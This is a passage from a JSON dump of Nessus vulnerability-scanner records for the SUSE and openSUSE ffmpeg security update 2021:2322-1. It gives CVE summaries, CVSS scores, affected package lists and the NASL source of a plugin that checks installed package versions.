libavfilter/vf_floodfill.c, which might lead to memory corruption and other potential consequences. (CVE-2020-22034)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the ff_v4l2_m2m_create_context function in v4l2_m2m.c. (CVE-2020-22038)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the inavi_add_ientry function. (CVE-2020-22039)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak at the fifo_alloc_common function in libavutil/fifo.c. (CVE-2020-22043)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the url_open_dyn_buf_internal function in libavformat/aviobuf.c. (CVE-2020-22044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-07-16T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : ffmpeg (openSUSE-SU-2021:2322-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-17539", "CVE-2020-13904", "CVE-2020-20448", "CVE-2020-20451", "CVE-2020-21041", "CVE-2020-22015", "CVE-2020-22016", "CVE-2020-22017", "CVE-2020-22019", "CVE-2020-22020", "CVE-2020-22021", "CVE-2020-22022", "CVE-2020-22023", "CVE-2020-22025", "CVE-2020-22026", "CVE-2020-22031", "CVE-2020-22032", "CVE-2020-22033", "CVE-2020-22034", "CVE-2020-22038", "CVE-2020-22039", "CVE-2020-22043", "CVE-2020-22044"], "modified": "2021-07-16T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ffmpeg", "p-cpe:/a:novell:opensuse:ffmpeg-private-devel", "p-cpe:/a:novell:opensuse:libavcodec-devel", "p-cpe:/a:novell:opensuse:libavcodec57", "p-cpe:/a:novell:opensuse:libavcodec57-32bit", "p-cpe:/a:novell:opensuse:libavdevice-devel", "p-cpe:/a:novell:opensuse:libavdevice57", "p-cpe:/a:novell:opensuse:libavdevice57-32bit", "p-cpe:/a:novell:opensuse:libavfilter-devel", "p-cpe:/a:novell:opensuse:libavfilter6", "p-cpe:/a:novell:opensuse:libavfilter6-32bit", "p-cpe:/a:novell:opensuse:libavformat-devel", "p-cpe:/a:novell:opensuse:libavformat57", "p-cpe:/a:novell:opensuse:libavformat57-32bit", "p-cpe:/a:novell:opensuse:libavresample-devel", "p-cpe:/a:novell:opensuse:libavresample3", "p-cpe:/a:novell:opensuse:libavresample3-32bit", "p-cpe:/a:novell:opensuse:libavutil-devel", "p-cpe:/a:novell:opensuse:libavutil55", "p-cpe:/a:novell:opensuse:libavutil55-32bit", "p-cpe:/a:novell:opensuse:libpostproc-devel", "p-cpe:/a:novell:opensuse:libpostproc54", "p-cpe:/a:novell:opensuse:libpostproc54-32bit", "p-cpe:/a:novell:opensuse:libswresample-devel", "p-cpe:/a:novell:opensuse:libswresample2", "p-cpe:/a:novell:opensuse:libswresample2-32bit", "p-cpe:/a:novell:opensuse:libswscale-devel", "p-cpe:/a:novell:opensuse:libswscale4", "p-cpe:/a:novell:opensuse:libswscale4-32bit", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-2322.NASL", "href": "https://www.tenable.com/plugins/nessus/151738", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:2322-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151738);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/16\");\n\n script_cve_id(\n \"CVE-2019-17539\",\n \"CVE-2020-13904\",\n \"CVE-2020-20448\",\n \"CVE-2020-20451\",\n \"CVE-2020-21041\",\n \"CVE-2020-22015\",\n \"CVE-2020-22016\",\n \"CVE-2020-22017\",\n \"CVE-2020-22019\",\n \"CVE-2020-22020\",\n \"CVE-2020-22021\",\n \"CVE-2020-22022\",\n \"CVE-2020-22023\",\n \"CVE-2020-22025\",\n \"CVE-2020-22026\",\n \"CVE-2020-22031\",\n \"CVE-2020-22032\",\n \"CVE-2020-22033\",\n \"CVE-2020-22034\",\n \"CVE-2020-22038\",\n \"CVE-2020-22039\",\n \"CVE-2020-22043\",\n \"CVE-2020-22044\"\n );\n\n script_name(english:\"openSUSE 15 Security Update : ffmpeg (openSUSE-SU-2021:2322-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2322-1 advisory.\n\n - In FFmpeg before 4.2, avcodec_open2 in libavcodec/utils.c allows a NULL pointer dereference and possibly\n unspecified other impact when there is no valid close function pointer. (CVE-2019-17539)\n\n - FFmpeg 2.8 and 4.2.3 has a use-after-free via a crafted EXTINF duration in an m3u8 file because\n parse_playlist in libavformat/hls.c frees a pointer, and later that pointer is accessed in\n av_probe_input_format3 in libavformat/format.c. (CVE-2020-13904)\n\n - FFmpeg 4.1.3 is affected by a Divide By Zero issue via libavcodec/ratecontrol.c, which allows a remote\n malicious user to cause a Denial of Service. (CVE-2020-20448)\n\n - Denial of Service issue in FFmpeg 4.2 due to resource management errors via fftools/cmdutils.c.\n (CVE-2020-20451)\n\n - Buffer Overflow vulnerability exists in FFmpeg 4.1 via apng_do_inverse_blend in libavcodec/pngenc.c, which\n could let a remote malicious user cause a Denial of Service (CVE-2020-21041)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 in mov_write_video_tag due to the out of bounds in\n libavformat/movenc.c, which could let a remote malicious user obtain sensitive information, cause a Denial\n of Service, or execute arbitrary code. (CVE-2020-22015)\n\n - A heap-based Buffer Overflow vulnerability in FFmpeg 4.2 at libavcodec/get_bits.h when writing .mov files,\n which might lead to memory corruption and other potential consequences. (CVE-2020-22016)\n\n - A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at ff_fill_rectangle in\n libavfilter/drawutils.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22017)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 at convolution_y_10bit in libavfilter/vf_vmafmotion.c, which\n could let a remote malicious user cause a Denial of Service. (CVE-2020-22019)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 in the build_diff_map function in libavfilter/vf_fieldmatch.c,\n which could let a remote malicious user cause a Denial of Service. (CVE-2020-22020)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 at filter_edges function in libavfilter/vf_yadif.c, which\n could let a remote malicious user cause a Denial of Service. (CVE-2020-22021)\n\n - A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 in filter_frame at\n libavfilter/vf_fieldorder.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22022)\n\n - A heap-based Buffer Overflow vulnerabililty exists in FFmpeg 4.2 in filter_frame at\n libavfilter/vf_bitplanenoise.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22023)\n\n - A heap-based Buffer Overflow vulnerability exists in gaussian_blur at libavfilter/vf_edgedetect.c, which\n might lead to memory corruption and other potential consequences. (CVE-2020-22025)\n\n - Buffer Overflow vulnerability exists in FFmpeg 4.2 in the config_input function at\n libavfilter/af_tremolo.c, which could let a remote malicious user cause a Denial of Service.\n (CVE-2020-22026)\n\n - A Heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at libavfilter/vf_w3fdif.c in\n filter16_complex_low, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22031)\n\n - A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_edgedetect.c in\n gaussian_blur, which might lead to memory corruption and other potential consequences. (CVE-2020-22032)\n\n - A heap-based Buffer Overflow Vulnerability exists FFmpeg 4.2 at libavfilter/vf_vmafmotion.c in\n convolution_y_8bit, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22033)\n\n - A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_floodfill.c, which might\n lead to memory corruption and other potential consequences. (CVE-2020-22034)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the\n ff_v4l2_m2m_create_context function in v4l2_m2m.c. (CVE-2020-22038)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the inavi_add_ientry\n function. (CVE-2020-22039)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak at the fifo_alloc_common\n function in libavutil/fifo.c. (CVE-2020-22043)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the\n url_open_dyn_buf_internal function in libavformat/aviobuf.c. (CVE-2020-22044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1172640\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186406\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186583\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186586\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186587\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186596\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186597\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186598\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186600\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186613\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186614\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186616\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186660\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186757\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186758\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186762\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186763\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MM55YS6XXAKFK3J35CDODMYMAZO6JX3S/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?900ad0a5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-17539\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-13904\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-20448\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-20451\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21041\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22015\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22017\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22019\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22020\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22021\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22022\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22023\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22025\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22032\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22033\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22034\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22038\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22039\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22043\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22044\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17539\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ffmpeg-private-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavcodec-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavcodec57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavcodec57-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavdevice-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavdevice57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavdevice57-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavfilter-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavfilter6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavfilter6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavformat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavformat57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavformat57-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavresample-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavresample3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavresample3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavutil-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavutil55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libavutil55-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpostproc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpostproc54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpostproc54-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswresample-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswresample2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswscale-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswscale4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libswscale4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'ffmpeg-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ffmpeg-private-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavcodec-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavcodec57-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavcodec57-32bit-3.4.2-11.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavdevice-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavdevice57-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavdevice57-32bit-3.4.2-11.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavfilter-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavfilter6-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavfilter6-32bit-3.4.2-11.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavformat-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavformat57-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavformat57-32bit-3.4.2-11.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavresample-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavresample3-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavresample3-32bit-3.4.2-11.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavutil-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavutil55-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libavutil55-32bit-3.4.2-11.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpostproc-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpostproc54-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpostproc54-32bit-3.4.2-11.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libswresample-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libswresample2-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libswresample2-32bit-3.4.2-11.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libswscale-devel-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libswscale4-3.4.2-11.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libswscale4-32bit-3.4.2-11.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ffmpeg / ffmpeg-private-devel / libavcodec-devel / libavcodec57 / etc');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-25T00:28:00", "description": "The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2021:2322-1 advisory.\n\n - In FFmpeg before 4.2, avcodec_open2 in libavcodec/utils.c allows a NULL pointer dereference and possibly unspecified other impact when there is no valid close function pointer. (CVE-2019-17539)\n\n - FFmpeg 2.8 and 4.2.3 has a use-after-free via a crafted EXTINF duration in an m3u8 file because parse_playlist in libavformat/hls.c frees a pointer, and later that pointer is accessed in av_probe_input_format3 in libavformat/format.c. (CVE-2020-13904)\n\n - FFmpeg 4.1.3 is affected by a Divide By Zero issue via libavcodec/ratecontrol.c, which allows a remote malicious user to cause a Denial of Service. (CVE-2020-20448)\n\n - Denial of Service issue in FFmpeg 4.2 due to resource management errors via fftools/cmdutils.c.\n (CVE-2020-20451)\n\n - Buffer Overflow vulnerability exists in FFmpeg 4.1 via apng_do_inverse_blend in libavcodec/pngenc.c, which could let a remote malicious user cause a Denial of Service (CVE-2020-21041)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 in mov_write_video_tag due to the out of bounds in libavformat/movenc.c, which could let a remote malicious user obtain sensitive information, cause a Denial of Service, or execute arbitrary code. (CVE-2020-22015)\n\n - A heap-based Buffer Overflow vulnerability in FFmpeg 4.2 at libavcodec/get_bits.h when writing .mov files, which might lead to memory corruption and other potential consequences. (CVE-2020-22016)\n\n - A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at ff_fill_rectangle in libavfilter/drawutils.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22017)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 at convolution_y_10bit in libavfilter/vf_vmafmotion.c, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22019)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 in the build_diff_map function in libavfilter/vf_fieldmatch.c, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22020)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 at filter_edges function in libavfilter/vf_yadif.c, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22021)\n\n - A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 in filter_frame at libavfilter/vf_fieldorder.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22022)\n\n - A heap-based Buffer Overflow vulnerabililty exists in FFmpeg 4.2 in filter_frame at libavfilter/vf_bitplanenoise.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22023)\n\n - A heap-based Buffer Overflow vulnerability exists in gaussian_blur at libavfilter/vf_edgedetect.c, which might lead to memory corruption and other potential consequences. (CVE-2020-22025)\n\n - Buffer Overflow vulnerability exists in FFmpeg 4.2 in the config_input function at libavfilter/af_tremolo.c, which could let a remote malicious user cause a Denial of Service.\n (CVE-2020-22026)\n\n - A Heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at libavfilter/vf_w3fdif.c in filter16_complex_low, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22031)\n\n - A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_edgedetect.c in gaussian_blur, which might lead to memory corruption and other potential consequences. (CVE-2020-22032)\n\n - A heap-based Buffer Overflow Vulnerability exists FFmpeg 4.2 at libavfilter/vf_vmafmotion.c in convolution_y_8bit, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22033)\n\n - A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_floodfill.c, which might lead to memory corruption and other potential consequences. (CVE-2020-22034)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the ff_v4l2_m2m_create_context function in v4l2_m2m.c. (CVE-2020-22038)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the inavi_add_ientry function. (CVE-2020-22039)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak at the fifo_alloc_common function in libavutil/fifo.c. (CVE-2020-22043)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the url_open_dyn_buf_internal function in libavformat/aviobuf.c. (CVE-2020-22044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-07-15T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : ffmpeg (SUSE-SU-2021:2322-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-17539", "CVE-2020-13904", "CVE-2020-20448", "CVE-2020-20451", "CVE-2020-21041", "CVE-2020-22015", "CVE-2020-22016", "CVE-2020-22017", "CVE-2020-22019", "CVE-2020-22020", "CVE-2020-22021", "CVE-2020-22022", "CVE-2020-22023", "CVE-2020-22025", "CVE-2020-22026", "CVE-2020-22031", "CVE-2020-22032", "CVE-2020-22033", "CVE-2020-22034", "CVE-2020-22038", "CVE-2020-22039", "CVE-2020-22043", "CVE-2020-22044"], "modified": "2021-08-09T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ffmpeg", "p-cpe:/a:novell:suse_linux:libavcodec-devel", "p-cpe:/a:novell:suse_linux:libavcodec57", "p-cpe:/a:novell:suse_linux:libavdevice57", "p-cpe:/a:novell:suse_linux:libavfilter6", "p-cpe:/a:novell:suse_linux:libavformat-devel", "p-cpe:/a:novell:suse_linux:libavformat57", "p-cpe:/a:novell:suse_linux:libavresample-devel", "p-cpe:/a:novell:suse_linux:libavresample3", "p-cpe:/a:novell:suse_linux:libavutil-devel", "p-cpe:/a:novell:suse_linux:libavutil55", "p-cpe:/a:novell:suse_linux:libpostproc-devel", "p-cpe:/a:novell:suse_linux:libpostproc54", "p-cpe:/a:novell:suse_linux:libswresample-devel", 